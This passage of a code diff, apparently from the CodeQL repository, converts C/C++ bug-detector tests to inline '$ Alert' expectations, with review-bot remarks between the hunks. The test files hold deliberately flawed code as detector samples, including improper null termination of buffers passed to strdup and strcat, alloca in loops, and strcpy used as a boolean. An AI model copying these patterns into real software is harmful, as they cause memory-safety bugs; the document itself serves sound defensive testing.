b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.cpp @@ -3,7 +3,7 @@ void C6317_positive(int i) { - if (i & !FLAGS) // BUG + if (i & !FLAGS) // BUG // $ Alert { } } 
@@ -28,9 +28,9 @@ void bitwiseAndUsage(unsigned int l, unsigned int r) unsigned int x; unsigned z = 0; - x = l & !r; //BUG - x = !FLAGS & r; //BUG - x = !FLAGS & !!r; //BUG + x = l & !r; //BUG // $ Alert + x = !FLAGS & r; //BUG // $ Alert + x = !FLAGS & !!r; //BUG // $ Alert x = !!l & r; // Not a bug - double negation x = !!!l & r; // Not a bug - double negation @@ -44,9 +44,9 @@ void bitwiseOrUsage(unsigned int l, unsigned int r) { unsigned int x; - x = l | !r; //BUG - x = !FLAGS | r; //BUG - x = !FLAGS | !!r; //BUG + x = l | !r; //BUG // $ Alert + x = !FLAGS | r; //BUG // $ Alert + x = !FLAGS | !!r; //BUG // $ Alert x = !!l | r; // Not a bug - double negation x = !!!l | r; // Not a bug - double negation @@ -67,14 +67,14 @@ void bitwiseOperatorsNotCovered(unsigned int l, unsigned int r) void macroUsage(unsigned int arg1, unsigned int arg2) { - if (((!cap_valid(arg1)) | arg2)) { // BUG + if (((!cap_valid(arg1)) | arg2)) { // BUG // $ Alert } } void bool_examples(bool a, bool b) { - if (a & !b) // dubious (confusing intent, but shouldn't produce a wrong result) + if (a & !b) // dubious (confusing intent, but shouldn't produce a wrong result) // $ Alert { } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.qlref index d50294defe2c..2defdf045755 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/IncorrectNotOperatorUsage.ql \ No newline at end of file +query: Likely Bugs/Likely Typos/IncorrectNotOperatorUsage.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/ShortCircuitBitMask.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/ShortCircuitBitMask.qlref index be55343c0a6c..8819dc134bf8 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/ShortCircuitBitMask.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/ShortCircuitBitMask.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/ShortCircuitBitMask.ql \ No newline at end of file +query: Likely Bugs/Likely Typos/ShortCircuitBitMask.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/big_ints.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/big_ints.cpp index 0f87c3d2fbfc..f404a063d98d 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/big_ints.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/big_ints.cpp @@ -1,14 +1,14 @@ static void bad(int x) { - x && 2; - x && 4; - x && 16; - x && 256; - x && 0x10000; - x && 0x80000000; - x && 0x100000000LL; - x && 0x800000000LL; - x && 0x10000000000LL; - x && 0x123456789ABLL; + x && 2; // $ Alert + x && 4; // $ Alert + x && 16; // $ Alert + x && 256; // $ Alert + x && 0x10000; // $ Alert + x && 0x80000000; // $ Alert + x && 0x100000000LL; // $ Alert + x && 0x800000000LL; // $ Alert + x && 0x10000000000LL; // $ Alert + x && 0x123456789ABLL; // $ Alert } static void good(int x) { @@ -29,7 +29,7 @@ static void good(int x) { template void templateFunc() { (i & (i - 1)) && true; - 4 && true; + 4 && true; // $ Alert } void templateTest() { @@ -66,4 +66,4 @@ void testMacro() #define MYFLAG (0x80) unsigned int calc1 = 123 & MYFLAG; // OK -unsigned int calc2 = 123 && MYFLAG; // BAD +unsigned int calc2 = 123 && MYFLAG; // BAD // $ Alert 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/UsingStrcpyAsBoolean.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/UsingStrcpyAsBoolean.qlref index 6ae254cc9747..008951cee5c1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/UsingStrcpyAsBoolean.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/UsingStrcpyAsBoolean.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/UsingStrcpyAsBoolean.ql +query: Likely Bugs/Likely Typos/UsingStrcpyAsBoolean.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.c index d08742a5add5..feefc4566f3a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.c 
@@ -31,37 +31,37 @@ void PositiveCases() char szbuf2[100]; int result; - if (strcpy(szbuf1, "test")) // Bug, direct usage + if (strcpy(szbuf1, "test")) // Bug, direct usage // $ Alert { } - if (!strcpy(szbuf1, "test")) // Bug, unary binary operator + if (!strcpy(szbuf1, "test")) // Bug, unary binary operator // $ Alert { } - if (strcpy(szbuf1, "test") == 0) // Bug, equality operator + if (strcpy(szbuf1, "test") == 0) // Bug, equality operator // $ Alert { } - if (SomeFunction() && strcpy(szbuf1, "test")) // Bug, binary logical operator + if (SomeFunction() && strcpy(szbuf1, "test")) // Bug, binary logical operator // $ Alert { } - if (strncpy(szbuf1, "test", 100)) // Bug + if (strncpy(szbuf1, "test", 100)) // Bug // $ Alert { } - if (!strncpy(szbuf1, "test", 100)) // Bug + if (!strncpy(szbuf1, "test", 100)) // Bug // $ Alert { } - result = !strncpy(szbuf1, "test", 100); // Bug - result = strcpy(szbuf1, "test") ? 1 : 0; // Bug - result = strcpy(szbuf1, "test") && 1; // Bug + result = !strncpy(szbuf1, "test", 100); // Bug // $ Alert + result = strcpy(szbuf1, "test") ? 1 : 0; // Bug // $ Alert + result = strcpy(szbuf1, "test") && 1; // Bug // $ Alert - result = strcpy(szbuf1, "test") == 0; // Bug + result = strcpy(szbuf1, "test") == 0; // Bug // $ Alert - result = strcpy(szbuf1, "test") != 0; // Bug + result = strcpy(szbuf1, "test") != 0; // Bug // $ Alert } void NegativeCases() diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.cpp index 707cf8466143..6cb2434dbd49 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.cpp 
@@ -72,71 +72,71 @@ void PositiveCases() locale_t x; *x = 0; - if (strcpy(szbuf1, "test")) // Bug, direct usage + if (strcpy(szbuf1, "test")) // Bug, direct usage // $ Alert { } - if (!strcpy(szbuf1, "test")) // Bug, unary binary operator + if (!strcpy(szbuf1, "test")) // Bug, unary binary operator // $ Alert { } - if (strcpy(szbuf1, "test") == 0) // Bug, equality operator + if (strcpy(szbuf1, "test") == 0) // Bug, equality operator // $ Alert { } - if (SomeFunction() && strcpy(szbuf1, "test")) // Bug, binary logical operator + if (SomeFunction() && strcpy(szbuf1, "test")) // Bug, binary logical operator // $ Alert { } - if (WCSCPY_6324(wscbuf1, wscbuf2)) // Bug, using a macro + if (WCSCPY_6324(wscbuf1, wscbuf2)) // Bug, using a macro // $ Alert { } - if (wcscpy(wscbuf1, wscbuf2)) // Bug + if (wcscpy(wscbuf1, wscbuf2)) // Bug // $ Alert { } - if (_mbscpy(mbcbuf1, mbcbuf2)) // Bug + if (_mbscpy(mbcbuf1, mbcbuf2)) // Bug // $ Alert { } - if (strncpy(szbuf1, "test", 100)) // Bug + if (strncpy(szbuf1, "test", 100)) // Bug // $ Alert { } - if (wcsncpy(wscbuf1, wscbuf2, 100)) // Bug + if (wcsncpy(wscbuf1, wscbuf2, 100)) // Bug // $ Alert { } - if (_mbsncpy(mbcbuf1, (const unsigned char*)"test", 100)) // Bug + if (_mbsncpy(mbcbuf1, (const unsigned char*)"test", 100)) // Bug // $ Alert { } - if (_strncpy_l(szbuf1, "test", 100, x)) // Bug + if (_strncpy_l(szbuf1, "test", 100, x)) // Bug // $ Alert { } - if (_wcsncpy_l(wscbuf1, wscbuf2, 100, x)) // Bug + if (_wcsncpy_l(wscbuf1, wscbuf2, 100, x)) // Bug // $ Alert { } - if (_mbsncpy_l(mbcbuf1, (const unsigned char*)"test", 100, x)) //Bug + if (_mbsncpy_l(mbcbuf1, (const unsigned char*)"test", 100, x)) //Bug // $ Alert { } - if (!strncpy(szbuf1, "test", 100)) // Bug + if (!strncpy(szbuf1, "test", 100)) // Bug // $ Alert { } - bool b = strncpy(szbuf1, "test", 100); // Bug + bool b = strncpy(szbuf1, "test", 100); // Bug // $ Alert - bool result = !strncpy(szbuf1, "test", 100); // Bug - result = strcpy(szbuf1, "test") ? 
1 : 0; // Bug - result = strcpy(szbuf1, "test") && 1; // Bug + bool result = !strncpy(szbuf1, "test", 100); // Bug // $ Alert + result = strcpy(szbuf1, "test") ? 1 : 0; // Bug // $ Alert + result = strcpy(szbuf1, "test") && 1; // Bug // $ Alert - result = strcpy(szbuf1, "test") == 0; // Bug + result = strcpy(szbuf1, "test") == 0; // Bug // $ Alert - result = strcpy(szbuf1, "test") != 0; // Bug + result = strcpy(szbuf1, "test") != 0; // Bug // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.c index d66e027bdc1e..74039347afdd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.c @@ -4,7 +4,7 @@ void Signed() for (i = 0; i < 100; i--) //BUG { - } + } // $ Alert for (i = 0; i < 100; i++) { @@ -12,7 +12,7 @@ void Signed() for (i = 100; i >= 0; i++) //BUG { - } + } // $ Alert for (i = 100; i >= 0; i--) { @@ -26,7 +26,7 @@ void Unsigned() for (i = 0; i < 100; i--) //BUG { - } + } // $ Alert for (i = 0; i < 100; i++) { @@ -34,7 +34,7 @@ void Unsigned() for (i = 100; i >= 0; i++) //BUG { - } + } // $ Alert for (i = 100; i >= 0; i--) { @@ -47,7 +47,7 @@ void InitializationOutsideLoop() for (; i < 100; i--) //BUG { - } + } // $ Alert i = 0; for (; i < 100; i++) @@ -57,7 +57,7 @@ void InitializationOutsideLoop() i = 100; for (; i >= 0; i++) //BUG { - } + } // $ Alert i = 100; for (; i >= 0; i--) diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.cpp index 0642eb747c41..768ba77af86f 100644 
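Review bot: In `Signed()`, `Unsigned()` and `InitializationOutsideLoop()` of inconsistentLoopDirection.c the new `// $ Alert` sits on the closing `}` of each loop while the existing `//BUG` marker stays on the `for` line, so the two annotations for one finding are now on different lines. Presumably the alert covers the whole `for` statement and the expectation has to be on its last line. A short file-level comment such as `// Expectations are placed on the last line of the flagged for statement.` would stop a later cleanup from moving them next to `//BUG`. The same layout is used in the hunks of inconsistentLoopDirection.cpp, and the enclosing functions start and end outside these hunks.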
--- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.cpp @@ -4,7 +4,7 @@ void Signed() for (i = 0; i < 100; i--) //BUG { - } + } // $ Alert for (i = 0; i < 100; i++) { @@ -12,7 +12,7 @@ void Signed() for (i = 100; i >= 0; i++) //BUG { - } + } // $ Alert for (i = 100; i >= 0; i--) { @@ -26,7 +26,7 @@ void Unsigned() for (i = 0; i < 100; i--) //BUG { - } + } // $ Alert for (i = 0; i < 100; i++) { @@ -34,7 +34,7 @@ void Unsigned() for (i = 100; i >= 0; i++) //BUG { - } + } // $ Alert for (i = 100; i >= 0; i--) { @@ -45,7 +45,7 @@ void DeclarationInLoop() { for (signed char i = 0; i < 100; --i) //BUG { - } + } // $ Alert for (signed char i = 0; i < 100; ++i) { @@ -53,7 +53,7 @@ void DeclarationInLoop() for (unsigned char i = 100; i >= 0; ++i) //BUG { - } + } // $ Alert for (unsigned char i = 100; i >= 0; --i) { @@ -68,7 +68,7 @@ void SignedWithVariables() for (i = min; i < max; i--) //BUG { - } + } // $ Alert for (i = min; i < max; i++) { @@ -76,7 +76,7 @@ void SignedWithVariables() for (i = max; i >= min; i++) //BUG { - } + } // $ Alert for (i = max; i >= min; i--) { @@ -90,7 +90,7 @@ void InitializationOutsideLoop() for (; i < 100; --i) //BUG { - } + } // $ Alert i = 0; for (; i < 100; ++i) @@ -100,7 +100,7 @@ void InitializationOutsideLoop() i = 100; for (; i >= 0; ++i) //BUG { - } + } // $ Alert i = 100; for (; i >= 0; --i) @@ -117,11 +117,11 @@ void InvalidCondition() for (i = max; i < min; i--) //BUG { - } + } // $ Alert for (i = min; i > max; i++) //BUG { - } + } // $ Alert } void InvalidConditionUnsignedCornerCase() 
@@ -132,14 +132,14 @@ void InvalidConditionUnsignedCornerCase() for (i = 100; i < 0; i--) //BUG { - } + } // $ Alert // Limitation. // Currently odasa will not detect this for-loop condition as always true // The rule will still detect the mismatch iterator, but the error message may change in the future. for (i = 200; i >= 0; i++) //BUG { - } + } // $ Alert } void NegativeTestCase() @@ -172,11 +172,11 @@ void FalseNegativeTestCases() { for (int i = 0; i < 10; i = i - 1) {} // For comparison - for (int i = 0; i < 10; i-- ) {} // BUG + for (int i = 0; i < 10; i-- ) {} // BUG // $ Alert for (int i = 100; i > 0; i += 2) {} // For comparison - for (int i = 100; i > 0; i ++ ) {} // BUG + for (int i = 100; i > 0; i ++ ) {} // BUG // $ Alert } void IntendedOverflow(unsigned char p) @@ -193,8 +193,8 @@ void IntendedOverflow(unsigned char p) for (i = m - 2; i < m; i--) {} // DUBIOUS for (i = m; i < m + 1; i--) {} // GOOD - for (s = 63; s < 64; s--) {} // BAD (signed numbers don't wrap at 0 / at all) - for (s = m + 1; s < m; s--) {} // BAD (never runs) + for (s = 63; s < 64; s--) {} // BAD (signed numbers don't wrap at 0 / at all) // $ Alert + for (s = m + 1; s < m; s--) {} // BAD (never runs) // $ Alert for (i = p - 1; i < p; i--) {} // GOOD for (s = p - 1; s < p; s--) {} // BAD [NOT DETECTED] @@ -212,7 +212,7 @@ void IntendedOverflow(unsigned char p) n = 64; for (s = n - 1; s < n; s--) {} // BAD [NOT DETECTED] n = 64; - for (s = n - 1; s < 64; s--) {} // BAD + for (s = n - 1; s < 64; s--) {} // BAD // $ Alert n = 64; for (s = 63; s < n; s--) {} // BAD [NOT DETECTED] } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.qlref index af5f0a899cbd..0436ab0d4bd6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.qlref 
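Review bot: The known false negatives in `IntendedOverflow()` (hunk `@@ -193,8`) stay as plain `// BAD [NOT DETECTED]` context lines with no inline expectation, so if the query later starts flagging them the test fails on an unexpected result and nothing in the file records that this was the intended outcome. Writing them as `for (s = p - 1; s < p; s--) {} // BAD [NOT DETECTED] // $ MISSING: Alert` records the gap in the form the post-processing query reads. The same applies to the `@@ -212,7` hunk (`s = n - 1; s < n` and `s = 63; s < n`). It also applies to `strdup(buffer1); // BAD [NOT DETECTED]` in the `@@ -23,8` hunk of ImproperNullTermination/test.cpp, where the tag would be `// $ MISSING: Alert[cpp/improper-null-termination]`. `IntendedOverflow()` begins and ends outside the hunk.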
+++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/inconsistentLoopDirection.ql \ No newline at end of file +query: Likely Bugs/Likely Typos/inconsistentLoopDirection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop.qlref index d5227c40ee4c..301aedbb9c35 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/AllocaInLoop.ql +query: Likely Bugs/Memory Management/AllocaInLoop.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1.cpp index 9071a1052b8d..97debb86c226 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1.cpp @@ -28,7 +28,7 @@ void foo(const struct vtype* vec, int count) { b1 = new char[w1]; } else { // Allocate the buffer on stack - b1 = (char*) alloca(w1); // BAD + b1 = (char*) alloca(w1); // BAD // $ Alert } } memcpy(b1, v, w1); @@ -52,7 +52,7 @@ void bar(const struct vtype* vec, int count) { b1 = new char[w1]; } else { // Allocate the buffer on stack - b1 = (char*) alloca(w1); // BAD + b1 = (char*) alloca(w1); // BAD // $ Alert } } } while (0); @@ -77,7 +77,7 @@ void baz(const struct vtype* vec, int count) { b1 = new char[w1]; } else { // Allocate the buffer on stack - b1 = (char*) alloca(w1); // BAD + b1 = (char*) alloca(w1); // BAD // $ Alert } } memcpy(b1, v, w1); 
@@ -107,7 +107,7 @@ void case5() { char *buffer; do { - buffer = (char*)alloca(1024); // BAD + buffer = (char*)alloca(1024); // BAD // $ Alert continue; } while (1); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1ms.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1ms.cpp index 9ebf4f17ba16..fd5433efff6e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1ms.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1ms.cpp @@ -25,7 +25,7 @@ void foo(const struct vtype* vec, int count) { b1 = new char[w1]; } else { // Allocate the buffer on stack - b1 = (char*) _alloca(w1); // BAD + b1 = (char*) _alloca(w1); // BAD // $ Alert } } memcpy(b1, v, w1); @@ -49,7 +49,7 @@ void bar(const struct vtype* vec, int count) { b1 = new char[w1]; } else { // Allocate the buffer on stack - b1 = (char*) _malloca(w1); // BAD + b1 = (char*) _malloca(w1); // BAD // $ Alert } } } while (0); @@ -76,7 +76,7 @@ void baz(const struct vtype* vec, int count) { b1 = new char[w1]; } else { // Allocate the buffer on stack - b1 = (char*) _alloca(w1); // BAD + b1 = (char*) _alloca(w1); // BAD // $ Alert } } memcpy(b1, v, w1); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop2.c b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop2.c index 7f8ce7a07fe0..f221740e33ab 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop2.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop2.c @@ -36,7 +36,7 @@ void foo(const struct vtype* vec, int count) { b1 = (char *)malloc(w1); } else { // Allocate the buffer on stack - b1 = (char*) alloca(w1); // BAD + b1 = (char*) alloca(w1); // BAD // $ Alert iter = 1; } } 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop3.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop3.cpp index b3418829e48f..575a7f2086b4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop3.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop3.cpp @@ -42,7 +42,7 @@ char *baz(int count) { char *buf; do { buf = ({ - char *b = (char *)alloca(32); // BAD + char *b = (char *)alloca(32); // BAD // $ Alert sprintf(b, "Value is %d\n", count); b; }); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/BoundedLoop.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/BoundedLoop.cpp index fbecb59588da..d1ee978df039 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/BoundedLoop.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/BoundedLoop.cpp @@ -22,7 +22,7 @@ void forTwice() { void forEver() { for (;;) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert } } @@ -35,7 +35,7 @@ void doTwice() { void unknownStartingPoint(int i) { for (; i < 2; i++) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert } } @@ -52,7 +52,7 @@ void atMostTwice() { void sometimesIncrement() { int i = 0; while (i < 2) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert if (getInt()) { i++; } @@ -61,7 +61,7 @@ void sometimesIncrement() { void upAndDown() { for (int i = 0; i < 2; i++) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert if (getInt()) { i--; } @@ -70,7 +70,7 @@ void upAndDown() { void largeBound() { for (int i = 0; i < 10000; i++) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert } } @@ -94,7 +94,7 @@ void maybeSmallOffset() { i = 9997; } for (; i < 10000; i++) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert } } 
@@ -102,7 +102,7 @@ void incBefore() { int i = -1; i++; // not understood by data flow for (; i < 2; i++) { - alloca(100); // GOOD [FALSE POSITIVE] + alloca(100); // GOOD [FALSE POSITIVE] // $ Alert } } @@ -135,7 +135,7 @@ void eqFalse() { void eqFalseFlipped() { for (int stop = 0; stop == 0; stop = 0) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert } } @@ -173,7 +173,7 @@ void countDownAssignAdd() { void countDownWrong() { for (int i = 2-1; i >= 0; i++) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert } } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTermination.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTermination.qlref index 3120e479150f..c09d3d9d76aa 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTermination.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTermination.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/ImproperNullTermination.ql \ No newline at end of file +query: Likely Bugs/Memory Management/ImproperNullTermination.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTerminationTainted.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTerminationTainted.qlref index 6fbfb31d7801..778616ca43c4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTerminationTainted.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTerminationTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-170/ImproperNullTerminationTainted.ql +query: Security/CWE/CWE-170/ImproperNullTerminationTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
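Review bot: In `incBefore()` the line `alloca(100); // GOOD [FALSE POSITIVE] // $ Alert` records a result that its own comment calls wrong as an ordinary expected alert. The inline-expectation syntax has a marker for this case: `alloca(100); // GOOD [FALSE POSITIVE] // $ SPURIOUS: Alert`. That form still passes today and points out the line once the data-flow limitation noted on `i++` is fixed, instead of leaving the false positive looking like a wanted detection. `incBefore()` starts outside the hunk.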
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/test.cpp index 49dc01a40df9..2b6d4ddd3f27 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/test.cpp @@ -23,8 +23,8 @@ void test_unassigned() char buffer1[1024]; char buffer2[1024]; - strdup(buffer1); // BAD - strdup(buffer2); // BAD + strdup(buffer1); // BAD // $ Alert[cpp/improper-null-termination] + strdup(buffer2); // BAD // $ Alert[cpp/improper-null-termination] memcpy(buffer2, buffer1, sizeof(buffer2)); strdup(buffer1); // BAD [NOT DETECTED] @@ -37,7 +37,7 @@ void test_unassigned() strcpy(buffer1, "content"); strdup(buffer1); // GOOD - strdup(buffer2); // BAD + strdup(buffer2); // BAD // $ Alert[cpp/improper-null-termination] memcpy(buffer2, buffer1, sizeof(buffer2)); strdup(buffer1); // GOOD @@ -57,7 +57,7 @@ void test_unassigned() char *ptr1; char *ptr2 = "content"; - strdup(ptr1); // BAD + strdup(ptr1); // BAD // $ Alert[cpp/improper-null-termination] strdup(ptr2); // GOOD } @@ -67,8 +67,8 @@ void test_unassigned() char *ptr; ptr = buffer1; - strdup(buffer1); // BAD - strdup(ptr); // BAD + strdup(buffer1); // BAD // $ Alert[cpp/improper-null-termination] + strdup(ptr); // BAD // $ Alert[cpp/improper-null-termination] strcpy(buffer1, "content"); strdup(buffer1); // GOOD @@ -79,8 +79,8 @@ void test_unassigned() strdup(ptr); // GOOD ptr = buffer2; - strdup(buffer2); // BAD - strdup(ptr); // BAD + strdup(buffer2); // BAD // $ Alert[cpp/improper-null-termination] + strdup(ptr); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -91,7 +91,7 @@ void test_unassigned() strcpy(buffer, "content"); strdup(buffer); // GOOD } - strdup(buffer); // BAD + strdup(buffer); // BAD // $ Alert[cpp/improper-null-termination] } { 
@@ -114,7 +114,7 @@ void test_unassigned() strcpy(buffer, "content"); strdup(buffer); // GOOD } - strdup(buffer); // BAD + strdup(buffer); // BAD // $ Alert[cpp/improper-null-termination] } } @@ -128,7 +128,7 @@ void test_caller() char buffer[1024]; test_callee("content", buffer); // GOOD - test_callee(buffer, "content"); // BAD + test_callee(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } void test_readlink(int fd, const char *path, size_t sz) @@ -137,7 +137,7 @@ void test_readlink(int fd, const char *path, size_t sz) char buffer[1024]; readlink(path, buffer, sizeof(buffer)); - strdup(buffer); // BAD + strdup(buffer); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -145,7 +145,7 @@ void test_readlink(int fd, const char *path, size_t sz) int v; readlinkat(fd, path, buffer, sizeof(buffer)); - v = strlen(buffer); // BAD + v = strlen(buffer); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -180,7 +180,7 @@ void test_readlink(int fd, const char *path, size_t sz) memset(buffer, 0, sizeof(buffer)); readlink(path, buffer, sizeof(buffer)); - strdup(buffer); // BAD + strdup(buffer); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -233,7 +233,7 @@ void test_strcat() { char buffer[1024]; - strcat(buffer, "content"); // BAD + strcat(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -261,7 +261,7 @@ void test_strcat() char buffer[1024]; buffer[0] = 'a'; - strcat(buffer, "content"); // BAD + strcat(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -282,7 +282,7 @@ void test_strcat() char buffer[1024]; doNothing(buffer); - strcat(buffer, "content"); // BAD + strcat(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } { 
